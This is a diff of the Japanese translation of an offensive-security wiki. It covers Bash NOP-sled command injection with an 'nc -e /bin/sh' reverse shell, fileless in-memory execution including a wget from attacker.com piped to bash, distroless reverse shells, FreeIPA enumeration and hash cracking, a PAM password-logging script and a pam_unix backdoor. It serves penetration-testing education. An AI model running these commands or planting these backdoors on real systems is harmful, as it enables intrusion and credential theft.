または別のシェルに到達する引数を部分的に制御できる場合、実行がペイロードを読み始める正確なオフセットがわからないことがあります。従来の NOP スレッド(例: `\x90`)はシェル構文では**機能しません**が、Bash はコマンドを実行する前に先頭の空白を無害に無視します。 +脆弱性により、最終的に `system()` または別のシェルに到達する引数を部分的に制御できる場合、実行がペイロードを読み始める正確なオフセットがわからないことがあります。従来の NOP スレッド(例: `\x90`)はシェル構文では **機能しません** が、Bash はコマンドを実行する前に先頭の空白を無害に無視します。 したがって、実際のコマンドの前に長いスペースまたはタブ文字のシーケンスを付加することで、*Bash 用の NOP スレッド*を作成できます: ```bash @@ -318,23 +318,23 @@ bypass-fs-protections-read-only-no-exec-distroless/ " nc -e /bin/sh 10.0.0.1 4444" # 16× spaces ───┘ ↑ real command ``` -もしROPチェーン(または任意のメモリ破損プリミティブ)が命令ポインタをスペースブロック内のどこかに配置すると、Bashパーサーは単にホワイトスペースをスキップし、`nc`に到達し、コマンドを確実に実行します。 +もしROPチェーン(または任意のメモリ破損プリミティブ)が命令ポインタをスペースブロック内のどこかに配置すると、Bashパーサーは単にホワイトスペースをスキップし、`nc`に到達してコマンドを確実に実行します。 実用的な使用例: -1. **メモリマップされた設定バイナリ**(例:NVRAM)で、プロセス間でアクセス可能なもの。 +1. **メモリマップされた設定ブロブ**(例:NVRAM)で、プロセス間でアクセス可能なもの。 2. 攻撃者がペイロードを整列させるためにNULLバイトを書き込むことができない状況。 3. BusyBox `ash`/`sh`のみが利用可能な組み込みデバイス – これらも先頭のスペースを無視します。 -> 🛠️ このトリックをROPガジェットと組み合わせて`system()`を呼び出すことで、メモリ制約のあるIoTルーターでのエクスプロイトの信頼性を大幅に向上させます。 +> 🛠️ このトリックを`system()`を呼び出すROPガジェットと組み合わせることで、メモリ制約のあるIoTルーターでのエクスプロイトの信頼性を大幅に向上させることができます。 -## 参考文献とその他 +## 参考文献と詳細 - [https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits](https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/Command%20Injection#exploits) - [https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet](https://github.com/Bo0oM/WAF-bypass-Cheat-Sheet) - [https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0](https://medium.com/secjuice/web-application-firewall-waf-evasion-techniques-2-125995f3e7b0) - [https://www.secjuice.com/web-application-firewall-waf-evasion/](https://www.secju) -- [放棄されたハードウェアのゼロデイを悪用する – Trail of Bitsブログ](https://blog.trailofbits.com/2025/07/25/exploiting-zero-days-in-abandoned-hardware/) +- [Exploiting zero days in abandoned hardware – Trail of Bits blog](https://blog.trailofbits.com/2025/07/25/exploiting-zero-days-in-abandoned-hardware/) {{#include ../../banners/hacktricks-training.md}} diff --git a/src/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md b/src/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md index ee53851dc..074d263d5 100644 --- a/src/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md +++ b/src/linux-hardening/bypass-bash-restrictions/bypass-fs-protections-read-only-no-exec-distroless/README.md @@ -11,7 +11,7 @@ ## 読み取り専用 / 実行不可シナリオ -Linuxマシンが**読み取り専用(ro)ファイルシステム保護**でマウントされていることがますます一般的になっています。特にコンテナでは、**`readOnlyRootFilesystem: true`**を`securitycontext`に設定するだけでroファイルシステムでコンテナを実行することができます: +Linuxマシンが**読み取り専用 (ro) ファイルシステム保護**でマウントされていることがますます一般的になっています。特にコンテナでは、**`readOnlyRootFilesystem: true`**を`securitycontext`に設定するだけで、roファイルシステムでコンテナを実行することができます: 
apiVersion: v1
 kind: Pod
@@ -33,7 +33,7 @@ securityContext:
 
 ## 最も簡単なバイパス: スクリプト
 
-バイナリについて言及したことに注意してください。インタープリタがマシン内にある限り、**任意のスクリプトを実行することができます**。例えば、`sh`が存在する場合は**シェルスクリプト**、`python`がインストールされている場合は**Pythonスクリプト**です。
+バイナリについて言及しましたが、インタープリタがマシン内にある限り、**任意のスクリプトを実行することができます**。例えば、`sh`が存在する場合は**シェルスクリプト**、`python`がインストールされている場合は**Pythonスクリプト**です。
 
 しかし、これはあなたのバイナリバックドアや他のバイナリツールを実行するには十分ではありません。
 
@@ -43,28 +43,29 @@ securityContext:
 
 ### FD + execシステムコールバイパス
 
-マシン内に**Python**、**Perl**、または**Ruby**のような強力なスクリプトエンジンがある場合、メモリから実行するためにバイナリをダウンロードし、メモリファイルディスクリプタ(`create_memfd`システムコール)に保存することができます。これはこれらの保護によって保護されず、次に**`exec`システムコール**を呼び出して**実行するファイルとしてfdを指定**します。
+マシン内に**Python**、**Perl**、または**Ruby**のような強力なスクリプトエンジンがある場合、メモリから実行するためにバイナリをダウンロードし、メモリファイルディスクリプタ(`create_memfd`システムコール)に保存することができます。これはこれらの保護によって保護されないため、**`exec`システムコール**を呼び出して**実行するファイルとしてfdを指定**します。
 
-これには、プロジェクト[**fileless-elf-exec**](https://github.com/nnsee/fileless-elf-exec)を簡単に使用できます。バイナリを渡すと、**バイナリが圧縮され、b64エンコード**され、`create_memfd`システムコールを呼び出して作成された**fd**で**デコードおよび解凍**するための指示を含むスクリプトが生成されます。
+これには、プロジェクト[**fileless-elf-exec**](https://github.com/nnsee/fileless-elf-exec)を簡単に使用できます。バイナリを渡すと、**バイナリが圧縮され、b64エンコードされた**スクリプトを指定された言語で生成し、`create_memfd`システムコールを呼び出して作成された**fd**で**デコードおよび解凍する**手順と、実行するための**exec**システムコールを呼び出します。
 
 > [!WARNING]
 > これはPHPやNodeのような他のスクリプト言語では機能しません。なぜなら、スクリプトから生のシステムコールを呼び出す**デフォルトの方法がないからです**。したがって、バイナリを保存するための**メモリfd**を作成するために`create_memfd`を呼び出すことはできません。
 >
-> さらに、`/dev/shm`内のファイルで**通常のfd**を作成しても機能しません。なぜなら、**実行不可保護**が適用されるため、実行することは許可されないからです。
+> さらに、`/dev/shm`にファイルを持つ**通常のfd**を作成しても機能しません。なぜなら、**実行不可保護**が適用されるため、実行することは許可されないからです。
 
 ### DDexec / EverythingExec
 
-[**DDexec / EverythingExec**](https://github.com/arget13/DDexec)は、**自分のプロセスのメモリを変更する**ことを可能にする技術です。これはその**`/proc/self/mem`**を上書きすることによって行われます。
+[**DDexec / EverythingExec**](https://github.com/arget13/DDexec)は、プロセスの**`/proc/self/mem`**を上書きすることによって**自分のプロセスのメモリを変更する**技術です。
 
 したがって、プロセスによって実行されているアセンブリコードを**制御することができ**、**シェルコード**を書き込み、プロセスを「変異」させて**任意のコードを実行する**ことができます。
 
 > [!TIP]
-> **DDexec / EverythingExec**を使用すると、**メモリから**自分の**シェルコード**や**任意のバイナリ**を**ロードして実行**することができます。
+> **DDexec / EverythingExec**を使用すると、**メモリ**から自分の**シェルコード**や**任意のバイナリ**を**ロードして実行**することができます。
 ```bash
 # Basic example
 wget -O- https://attacker.com/binary.elf | base64 -w0 | bash ddexec.sh argv0 foo bar
 ```
-この技術に関する詳細は、Githubを確認するか、次を参照してください:
+For more information about this technique check the Github or:
+
 
 {{#ref}}
 ddexec.md
@@ -72,39 +73,40 @@ ddexec.md
 
 ### MemExec
 
-[**Memexec**](https://github.com/arget13/memexec)は、DDexecの自然な次のステップです。これは**DDexecシェルコードのデーモン化**であり、異なるバイナリを**実行したいとき**にDDexecを再起動する必要はなく、DDexec技術を介してmemexecシェルコードを実行し、その後**このデーモンと通信して新しいバイナリを読み込んで実行する**ことができます。
+[**Memexec**](https://github.com/arget13/memexec) は DDexec の自然な次のステップです。これは **DDexec シェルコードのデーモン化** であり、異なるバイナリを **実行したいとき** に DDexec を再起動する必要はなく、DDexec テクニックを介して memexec シェルコードを実行し、その後 **このデーモンと通信して新しいバイナリを読み込んで実行する** ことができます。
 
-**memexecを使用してPHPリバースシェルからバイナリを実行する方法の例**は、[https://github.com/arget13/memexec/blob/main/a.php](https://github.com/arget13/memexec/blob/main/a.php)で見つけることができます。
+**memexec を使用して PHP リバースシェルからバイナリを実行する方法の例** は [https://github.com/arget13/memexec/blob/main/a.php](https://github.com/arget13/memexec/blob/main/a.php) で見つけることができます。
 
 ### Memdlopen
 
-DDexecと同様の目的を持つ[**memdlopen**](https://github.com/arget13/memdlopen)技術は、**メモリにバイナリを読み込む**より簡単な方法を提供します。依存関係を持つバイナリを読み込むことさえ可能です。
+DDexec と同様の目的を持つ [**memdlopen**](https://github.com/arget13/memdlopen) テクニックは、**メモリにバイナリを読み込む** より簡単な方法を提供します。依存関係を持つバイナリを読み込むことさえ可能です。
 
 ## Distroless Bypass
 
-### Distrolessとは
+### What is distroless
 
-Distrolessコンテナは、特定のアプリケーションやサービスを実行するために必要な**最小限のコンポーネントのみ**を含み、ライブラリやランタイム依存関係などを含みますが、パッケージマネージャー、シェル、システムユーティリティなどの大きなコンポーネントは除外されます。
+Distroless コンテナは、特定のアプリケーションやサービスを実行するために必要な **最小限のコンポーネント** のみを含み、ライブラリやランタイム依存関係などを含みますが、パッケージマネージャー、シェル、システムユーティリティなどの大きなコンポーネントは除外されます。
 
-Distrolessコンテナの目的は、**不要なコンポーネントを排除することによってコンテナの攻撃面を減少させ**、悪用可能な脆弱性の数を最小限に抑えることです。
+Distroless コンテナの目的は、**不要なコンポーネントを排除することによってコンテナの攻撃面を減少させ**、悪用される可能性のある脆弱性の数を最小限に抑えることです。
 
-### リバースシェル
+### Reverse Shell
 
-Distrolessコンテナでは、通常のシェルを取得するための`sh`や`bash`が**見つからない**かもしれません。また、`ls`、`whoami`、`id`などのバイナリも見つかりません... システムで通常実行するすべてのものです。
+Distroless コンテナでは、通常のシェルを取得するための `sh` や `bash` を **見つけられない** かもしれません。また、`ls`、`whoami`、`id` などのバイナリも見つかりません... システムで通常実行するすべてのものです。
 
 > [!WARNING]
-> したがって、**リバースシェル**を取得したり、通常のように**システムを列挙**したりすることは**できません**。
+> したがって、**リバースシェル** を取得したり、通常のように **システムを列挙** することは **できません**。
 
-ただし、侵害されたコンテナが例えばflaskウェブを実行している場合、pythonがインストールされているため、**Pythonリバースシェル**を取得できます。nodeを実行している場合はNodeリバースシェルを取得でき、ほとんどの**スクリプト言語**でも同様です。
+ただし、侵害されたコンテナが例えば Flask ウェブを実行している場合、Python がインストールされているため、**Python リバースシェル** を取得できます。Node を実行している場合は Node リバースシェルを取得でき、ほとんどの **スクリプト言語** でも同様です。
 
 > [!TIP]
-> スクリプト言語を使用することで、言語の機能を利用して**システムを列挙**することができます。
+> スクリプト言語を使用することで、言語の機能を利用して **システムを列挙** することができます。
 
-**`read-only/no-exec`**保護がない場合、リバースシェルを悪用して**ファイルシステムにバイナリを書き込み**、**実行**することができます。
+**read-only/no-exec** 保護が **ない** 場合、リバースシェルを悪用して **ファイルシステムにバイナリを書き込み**、それらを **実行** することができます。
 
 > [!TIP]
-> ただし、この種のコンテナでは通常これらの保護が存在しますが、**以前のメモリ実行技術を使用してそれらを回避する**ことができます。
+> ただし、この種のコンテナでは通常これらの保護が存在しますが、**以前のメモリ実行テクニックを使用してそれらを回避する** ことができます。
+
+**RCE 脆弱性を悪用してスクリプト言語のリバースシェルを取得し、メモリからバイナリを実行する方法の例** は [**https://github.com/carlospolop/DistrolessRCE**](https://github.com/carlospolop/DistrolessRCE) で見つけることができます。
 
-**RCE脆弱性を悪用してスクリプト言語の**リバースシェル**を取得し、メモリからバイナリを実行する方法の**例**は、[**https://github.com/carlospolop/DistrolessRCE**](https://github.com/carlospolop/DistrolessRCE)で見つけることができます。
 
 {{#include ../../../banners/hacktricks-training.md}}
diff --git a/src/linux-hardening/freeipa-pentesting.md b/src/linux-hardening/freeipa-pentesting.md
index 7c94603d6..b808f6947 100644
--- a/src/linux-hardening/freeipa-pentesting.md
+++ b/src/linux-hardening/freeipa-pentesting.md
@@ -4,40 +4,40 @@
 
 ## 基本情報
 
-FreeIPAは、主に**Unix**環境向けのMicrosoft Windows **Active Directory**のオープンソースの**代替**です。これは、Active Directoryに類似した管理のために、完全な**LDAPディレクトリ**とMIT **Kerberos**キー配布センターを組み合わせています。CAおよびRA証明書管理のためにDogtag **Certificate System**を利用し、スマートカードを含む**多要素**認証をサポートしています。SSSDはUnix認証プロセスのために統合されています。
+FreeIPAは、主に**Unix**環境向けのMicrosoft Windows **Active Directory**のオープンソース**代替**です。これは、Active Directoryに類似した管理のために、完全な**LDAPディレクトリ**とMIT **Kerberos**キー配布センターを組み合わせています。CAおよびRA証明書管理のためにDogtag **証明書システム**を利用し、スマートカードを含む**多要素**認証をサポートしています。SSSDはUnix認証プロセスのために統合されています。
 
-## フィンガープリンツ
+## フィンガープリント
 
 ### ファイルと環境変数
 
-- Kerberosクライアント情報は、ドメインへの登録に必要で、`/etc/krb5.conf`に保存されています。これにはKDCと管理サーバーの場所、デフォルト設定、およびマッピングが含まれます。
-- IPAクライアントとサーバーのシステム全体のデフォルトは、`/etc/ipa/default.conf`に設定されています。
+- `/etc/krb5.conf`にあるファイルは、ドメインへの登録に必要なKerberosクライアント情報が保存されている場所です。これにはKDCと管理サーバーの場所、デフォルト設定、およびマッピングが含まれます。
+- IPAクライアントとサーバーのシステム全体のデフォルトは、`/etc/ipa/default.conf`にあるファイルで設定されています。
 - ドメイン内のホストは、認証プロセスのために`/etc/krb5.keytab`に`krb5.keytab`ファイルを持っている必要があります。
-- Kerberos認証に関連する特定のファイルと設定を指すために、さまざまな環境変数(`KRB5CCNAME`、`KRB5_KTNAME`、`KRB5_CONFIG`、`KRB5_KDC_PROFILE`、`KRB5RCACHETYPE`、`KRB5RCACHEDIR`、`KRB5_TRACE`、`KRB5_CLIENT_KTNAME`、`KPROP_PORT`)が使用されます。
+- 様々な環境変数(`KRB5CCNAME`、`KRB5_KTNAME`、`KRB5_CONFIG`、`KRB5_KDC_PROFILE`、`KRB5RCACHETYPE`、`KRB5RCACHEDIR`、`KRB5_TRACE`、`KRB5_CLIENT_KTNAME`、`KPROP_PORT`)は、Kerberos認証に関連する特定のファイルや設定を指し示すために使用されます。
 
 ### バイナリ
 
-`ipa`、`kdestroy`、`kinit`、`klist`、`kpasswd`、`ksu`、`kswitch`、`kvno`などのツールは、FreeIPAドメインの管理、Kerberosチケットの処理、パスワードの変更、サービスチケットの取得などの機能において中心的な役割を果たします。
+`ipa`、`kdestroy`、`kinit`、`klist`、`kpasswd`、`ksu`、`kswitch`、`kvno`などのツールは、FreeIPAドメインの管理、Kerberosチケットの処理、パスワードの変更、サービスチケットの取得などの機能において重要です。
 
 ### ネットワーク
 
-典型的なFreeIPAサーバーのセットアップを示す図があります。
+典型的なFreeIPAサーバーのセットアップを示す図が提供されています。
 
 ## 認証
 
-FreeIPAにおける認証は、**Kerberos**を利用して**Active Directory**のそれを反映しています。ドメインリソースへのアクセスには、有効なKerberosチケットが必要であり、これはFreeIPAドメインの設定に応じてさまざまな場所に保存されます。
+FreeIPAにおける認証は、**Kerberos**を利用して**Active Directory**のそれを反映しています。ドメインリソースへのアクセスには、有効なKerberosチケットが必要であり、これはFreeIPAドメインの設定に応じて様々な場所に保存されます。
 
 ### **CCACHEチケットファイル**
 
-CCACHEファイルは通常**`/tmp`**に**600**の権限で保存され、Kerberos資格情報を保存するためのバイナリ形式であり、ユーザーの平文パスワードなしで認証を行うために重要です。CCACHEチケットの解析は`klist`コマンドを使用して行うことができ、有効なCCACHEチケットを再利用するには、`KRB5CCNAME`をチケットファイルのパスにエクスポートします。
+CCACHEファイルは、通常**`/tmp`**に**600**の権限で保存され、Kerberos資格情報を保存するためのバイナリ形式であり、ユーザーの平文パスワードなしで認証を行うために重要です。CCACHEチケットの解析は`klist`コマンドを使用して行うことができ、有効なCCACHEチケットを再利用するには、`KRB5CCNAME`をチケットファイルのパスにエクスポートします。
 
 ### **Unixキーレング**
 
-代わりに、CCACHEチケットはLinuxキーレングに保存でき、チケット管理に対するより多くの制御を提供します。チケットストレージの範囲は(`KEYRING:name`、`KEYRING:process:name`、`KEYRING:thread:name`、`KEYRING:session:name`、`KEYRING:persistent:uidnumber`)異なり、`klist`はユーザーのためにこの情報を解析できます。ただし、UnixキーレングからCCACHEチケットを再利用することは課題を伴う場合があり、Kerberosチケットを抽出するための**Tickey**のようなツールが利用可能です。
+代わりに、CCACHEチケットはLinuxキーレングに保存でき、チケット管理に対するより多くの制御を提供します。チケットストレージの範囲は(`KEYRING:name`、`KEYRING:process:name`、`KEYRING:thread:name`、`KEYRING:session:name`、`KEYRING:persistent:uidnumber`)異なり、`klist`はユーザーのためにこの情報を解析できます。しかし、UnixキーレングからCCACHEチケットを再利用することは課題を伴う場合があり、Kerberosチケットを抽出するための**Tickey**のようなツールが利用可能です。
 
 ### キータブ
 
-Kerberosプリンシパルと暗号化されたキーを含むキータブファイルは、プリンシパルのパスワードを必要とせずに有効なチケット付与チケット(TGT)を取得するために重要です。キータブファイルからの資格情報の解析と再利用は、`klist`や**KeytabParser**のようなスクリプトを使用して簡単に行えます。
+Kerberosプリンシパルと暗号化されたキーを含むキータブファイルは、プリンシパルのパスワードを必要とせずに有効なチケット付与チケット(TGT)を取得するために重要です。キータブファイルからの資格情報の解析と再利用は、`klist`のようなユーティリティや**KeytabParser**のようなスクリプトを使用して簡単に行えます。
 
 ### チートシート
 
@@ -50,7 +50,7 @@ privilege-escalation/linux-active-directory.md
 ## 列挙
 
 > [!WARNING]
-> **ldap**や他の**バイナリ**ツールを介して、または**FreeIPAサーバーのポート443に接続することによって**、**列挙**を行うことができます。
+> **ldap**や他の**バイナリ**ツールを使用して**列挙**を行うことができるほか、**FreeIPAサーバーのポート443に接続する**ことも可能です。
 
 ### ホスト、ユーザー、およびグループ 
 
@@ -60,7 +60,7 @@ FreeIPAでは、LDAPサーバーはデフォルトで**匿名バインド**を
 ```
 ldapsearch -x
 ```
-**詳細情報**を取得するには、**認証された**セッションを使用する必要があります(認証セクションを確認して、認証されたセッションを準備する方法を学んでください)。
+**詳細情報**を取得するには、**認証された**セッションを使用する必要があります(認証セクションを確認して、認証されたセッションの準備方法を学んでください)。
 ```bash
 # Get all users of domain
 ldapsearch -Y gssapi -b "cn=users,cn=compat,dc=domain_name,dc=local"
@@ -74,7 +74,7 @@ ldapsearch -Y gssapi -b "cn=computers,cn=accounts,dc=domain_name,dc=local"
 # Get hosts groups
 ldapsearch -Y gssapi -b "cn=hostgroups,cn=accounts,dc=domain_name,dc=local"
 ```
-ドメインに参加しているマシンから、**インストールされたバイナリ**を使用してドメインを列挙できます:
+ドメインに参加しているマシンから、**インストールされたバイナリ**を使用してドメインを列挙することができます:
 ```bash
 ipa user-find
 ipa usergroup-find
@@ -88,33 +88,33 @@ ipa usergroup-show  --all
 ipa host-find  --all
 ipa hostgroup-show  --all
 ```
-> [!NOTE]
+> [!TIP]
 > **FreeIPA**の**admin**ユーザーは、**AD**の**domain admins**に相当します。
 
-### Hashes 
+### ハッシュ 
 
 **IPAサーバー**の**root**ユーザーは、パスワードの**ハッシュ**にアクセスできます。
 
-- ユーザーのパスワードハッシュは、**userPassword** **属性**に**base64**として保存されます。このハッシュは**SSHA512**(古いバージョンのFreeIPA)または**PBKDF2_SHA256**である可能性があります。
+- ユーザーのパスワードハッシュは、“**userPassword**”**属性**に**base64**として保存されています。このハッシュは**SSHA512**(古いバージョンのFreeIPA)または**PBKDF2_SHA256**である可能性があります。
 - システムが**AD**と**統合**されている場合、パスワードの**Nthash**は“**ipaNTHash**”に**base64**として保存されます。
 
 これらのハッシュをクラックするには:
 
-• freeIPAがADと統合されている場合、**ipaNTHash**は簡単にクラックできます:**base64**を**デコード** -> **ASCII**の16進数として再エンコード -> John The Ripperまたは**hashcat**が迅速にクラックするのを助けてくれます
+• FreeIPAがADと統合されている場合、**ipaNTHash**は簡単にクラックできます:**base64**を**デコード**して、**ASCII**の16進数に再エンコードし、John The Ripperまたは**hashcat**を使用して迅速にクラックできます。
 
-• 古いバージョンのFreeIPAが使用されている場合、**SSHA512**が使用されます:**base64**をデコード -> SSHA512 **ハッシュ**を見つける -> John The Ripperまたは**hashcat**がクラックするのを助けてくれます
+• 古いバージョンのFreeIPAが使用されている場合、**SSHA512**が使用されます:**base64**をデコードして、SSHA512の**ハッシュ**を見つけ、John The Ripperまたは**hashcat**を使用してクラックできます。
 
-• 新しいバージョンのFreeIPAが使用されている場合、**PBKDF2_SHA256**が使用されます:**base64**をデコード -> PBKDF2_SHA256を見つける -> **長さ**は256バイトです。Johnは256ビット(32バイト)で動作できます -> SHA-265が擬似乱数関数として使用され、ブロックサイズは32バイトです -> PBKDF2_SHA256ハッシュの最初の256ビットのみを使用できます -> John The Ripperまたはhashcatがクラックするのを助けてくれます
+• 新しいバージョンのFreeIPAが使用されている場合、**PBKDF2_SHA256**が使用されます:**base64**をデコードして、PBKDF2_SHA256を見つけます。その**長さ**は256バイトです。Johnは256ビット(32バイト)で動作できます。SHA-265が擬似乱数関数として使用され、ブロックサイズは32バイトです。PBKDF2_SHA256ハッシュの最初の256ビットのみを使用できます。John The Ripperまたはhashcatを使用してクラックできます。
 
 

 
-ハッシュを抽出するには、**FreeIPAサーバーのroot**である必要があります。そこで、ツール**`dbscan`**を使用してそれらを抽出できます:
+ハッシュを抽出するには、**FreeIPAサーバーのroot**である必要があります。そこで、ツール**`dbscan`**を使用して抽出できます:
 
 

 
-### HBAC-Rules 
+### HBACルール 
 
-リソース(ホスト、サービス、サービスグループなど)に対してユーザーまたはホストに特定の権限を付与するルールがあります。
+特定のリソース(ホスト、サービス、サービスグループなど)に対してユーザーまたはホストに特定の権限を付与するルールです。
 ```bash
 # Enumerate using ldap
 ldapsearch -Y gssapi -b "cn=hbac,dc=domain_name,dc=local"
@@ -125,7 +125,7 @@ ipa hbacrule-show  --all
 ```
 #### Sudo-Rules
 
-FreeIPAは、sudo-rulesを介して**sudo権限**の集中管理を可能にします。これらのルールは、ドメイン内のホストでsudoを使用してコマンドを実行することを許可または制限します。攻撃者は、これらのルールセットを調査することで、適用可能なホスト、ユーザー、および許可されたコマンドを特定する可能性があります。
+FreeIPA は **sudo permissions** に対する中央集権的な制御を sudo-rules を通じて可能にします。これらのルールは、ドメイン内のホストで sudo を使用してコマンドを実行することを許可または制限します。攻撃者は、これらのルールセットを調べることで、適用可能なホスト、ユーザー、および許可されたコマンドを特定する可能性があります。
 ```bash
 # Enumerate using ldap
 ldapsearch -Y gssapi -b "cn=sudorules,cn=sudo,dc=domain_name,dc=local"
@@ -134,17 +134,17 @@ ipa sudorule-find
 # Show info of rule
 ipa sudorule-show  --all
 ```
-### ロールベースのアクセス制御
+### ロールベースアクセス制御
 
-**ロール**は、さまざまな**特権**で構成されており、それぞれが一連の**権限**を含んでいます。これらのロールは、ユーザー、ユーザー**グループ**、**ホスト**、ホストグループ、およびサービスに割り当てることができます。たとえば、FreeIPAのデフォルトの「ユーザー管理者」ロールを考えて、この構造を例示します。
+A **role** is comprised of various **privileges**, each of which encompasses a collection of **permissions**. These roles can be assigned to Users, User **Groups**, **Hosts**, Host Groups, and Services. For instance, consider the default “User Administrator” role in FreeIPA to exemplify this structure.
 
-ロール`User Administrator`には、次の特権があります:
+The role `User Administrator` has these privileges:
 
-- **ユーザー管理者**
-- **グループ管理者**
-- **ステージユーザー管理者**
+- **User Administrators**
+- **Group Administrators**
+- **Stage User Administrators**
 
-次のコマンドを使用すると、ロール、特権、および権限を列挙することができます:
+With the following commands it's possibel to enumerate the roles, privileges and permissions:
 ```bash
 # Using ldap
 ldapsearch -Y gssapi -b "cn=roles,cn=accounts,dc=westeros,dc=local"
@@ -170,9 +170,9 @@ ipa permission-show  --all
 ### ~~rootユーザーの作成~~
 
 > [!WARNING]
-> **`root`という名前の新しいユーザーを作成できる場合、** 彼になりすますことができ、**rootとして任意のマシンにSSH接続できるようになります。**
+> **`root`という名前の新しいユーザーを作成できる場合、** 彼を偽装することができ、**rootとして任意のマシンにSSH接続できるようになります。**
 >
-> **これはパッチが適用されています。**
+> **これはパッチされています。**
 
 [https://posts.specterops.io/attacking-freeipa-part-iv-cve-2020-10747-7c373a1bf66b](https://posts.specterops.io/attacking-freeipa-part-iv-cve-2020-10747-7c373a1bf66b) で詳細な説明を確認できます。
 
diff --git a/src/linux-hardening/linux-post-exploitation/README.md b/src/linux-hardening/linux-post-exploitation/README.md
index bedc46247..2d1d5fa3d 100644
--- a/src/linux-hardening/linux-post-exploitation/README.md
+++ b/src/linux-hardening/linux-post-exploitation/README.md
@@ -4,7 +4,7 @@
 
 ## PAMを使用したログインパスワードのスニッフィング
 
-各ユーザーがログインに使用するパスワードをログに記録するためにPAMモジュールを設定しましょう。PAMが何か分からない場合は、以下を確認してください:
+各ユーザーがログインに使用するパスワードを記録するためにPAMモジュールを設定しましょう。PAMが何か分からない場合は、以下を確認してください:
 
 {{#ref}}
 pam-pluggable-authentication-modules.md
@@ -19,7 +19,7 @@ pam-pluggable-authentication-modules.md
 
 - `toomanysecrets.sh`という名前のbashスクリプトが作成され、ログイン試行を記録し、日付、ユーザー名(`$PAM_USER`)、パスワード(stdin経由)、およびリモートホストIP(`$PAM_RHOST`)を`/var/log/toomanysecrets.log`にキャプチャします。
 - スクリプトは実行可能にされ、`pam_exec.so`モジュールを使用してPAM設定(`common-auth`)に統合され、静かに実行し、認証トークンをスクリプトに公開するオプションが付与されます。
-- このアプローチは、侵害されたLinuxホストがどのようにして資格情報を密かにログに記録するために悪用されるかを示しています。
+- このアプローチは、侵害されたLinuxホストが資格情報を密かに記録するためにどのように悪用されるかを示しています。
 ```bash
 #!/bin/sh
 echo " $(date) $PAM_USER, $(cat -), From: $PAM_RHOST" >> /var/log/toomanysecrets.log
@@ -33,9 +33,9 @@ sudo chmod 700 /usr/local/bin/toomanysecrets.sh
 
 **詳細については[元の投稿](https://infosecwriteups.com/creating-a-backdoor-in-pam-in-5-line-of-code-e23e99579cd9)を確認してください**。これは要約です:
 
-Pluggable Authentication Module (PAM)は、Linuxでユーザー認証に使用されるシステムです。これは、**ユーザー名**、**パスワード**、および**サービス**の3つの主要な概念に基づいています。各サービスの設定ファイルは`/etc/pam.d/`ディレクトリにあり、共有ライブラリが認証を処理します。
+Pluggable Authentication Module (PAM)は、Linuxでユーザー認証に使用されるシステムです。これは、**ユーザー名**、**パスワード**、および**サービス**の3つの主要な概念に基づいて動作します。各サービスの設定ファイルは`/etc/pam.d/`ディレクトリにあり、共有ライブラリが認証を処理します。
 
-**目的**:特定のパスワードでの認証を許可するようにPAMを変更し、実際のユーザーパスワードをバイパスします。これは、パスワード検証のためにほぼすべてのサービスに含まれる`common-auth`ファイルで使用される`pam_unix.so`共有ライブラリに特に焦点を当てています。
+**目的**:特定のパスワードでの認証を許可するようにPAMを変更し、実際のユーザーパスワードをバイパスします。これは、パスワード検証のためにほぼすべてのサービスによって含まれる`common-auth`ファイルで使用される`pam_unix.so`共有ライブラリに特に焦点を当てています。
 
 ### `pam_unix.so`の変更手順:
 
@@ -43,11 +43,11 @@ Pluggable Authentication Module (PAM)は、Linuxでユーザー認証に使用
 - ユーザーのパスワードを確認する責任がある行は`pam_unix.so`を呼び出します。
 2. **ソースコードを変更**:
 - `pam_unix_auth.c`ソースファイルに、事前定義されたパスワードが使用された場合にアクセスを許可する条件文を追加し、そうでない場合は通常の認証プロセスを続行します。
-3. **再コンパイルして**、適切なディレクトリに変更された`pam_unix.so`ライブラリを置き換えます。
+3. **修正された`pam_unix.so`ライブラリを適切なディレクトリに再コンパイルして置き換えます**。
 4. **テスト**:
 - 事前定義されたパスワードでさまざまなサービス(ログイン、ssh、sudo、su、スクリーンセーバー)にアクセスが許可され、通常の認証プロセスには影響がありません。
 
-> [!NOTE]
-> このプロセスは[https://github.com/zephrax/linux-pam-backdoor](https://github.com/zephrax/linux-pam-backdoor)で自動化できます。
+> [!TIP]
+> このプロセスを[https://github.com/zephrax/linux-pam-backdoor](https://github.com/zephrax/linux-pam-backdoor)で自動化できます。
 
 {{#include ../../banners/hacktricks-training.md}}
diff --git a/src/linux-hardening/privilege-escalation/README.md b/src/linux-hardening/privilege-escalation/README.md
index afe40b23c..7d5a456be 100644
--- a/src/linux-hardening/privilege-escalation/README.md
+++ b/src/linux-hardening/privilege-escalation/README.md
@@ -6,7 +6,7 @@
 
 ### OS情報
 
-まず、実行中のOSについての知識を得ることから始めましょう。
+OSの知識を得ることから始めましょう。
 ```bash
 (cat /proc/version || uname -a ) 2>/dev/null
 lsb_release -a 2>/dev/null # old, not by default on many systems
@@ -14,7 +14,7 @@ cat /etc/os-release 2>/dev/null # universal on modern systems
 ```
 ### Path
 
-もし**`PATH`** 変数内の任意のフォルダーに書き込み権限がある場合、いくつかのライブラリやバイナリをハイジャックできる可能性があります:
+もしあなたが`PATH`変数内の任意のフォルダーに**書き込み権限を持っている場合**、いくつかのライブラリやバイナリをハイジャックできるかもしれません:
 ```bash
 echo $PATH
 ```
@@ -43,9 +43,9 @@ curl https://raw.githubusercontent.com/lucyoa/kernel-exploits/master/README.md 2
 
 [linux-exploit-suggester.sh](https://github.com/mzet-/linux-exploit-suggester)\
 [linux-exploit-suggester2.pl](https://github.com/jondonas/linux-exploit-suggester-2)\
-[linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py) (被害者で実行、カーネル2.xの脆弱性のみをチェック)
+[linuxprivchecker.py](http://www.securitysift.com/download/linuxprivchecker.py) (被害者で実行、カーネル2.xの脆弱性のみをチェック)
 
-常に**Googleでカーネルバージョンを検索**してください。おそらくあなたのカーネルバージョンがいくつかのカーネル脆弱性に記載されており、その場合、この脆弱性が有効であることが確認できます。
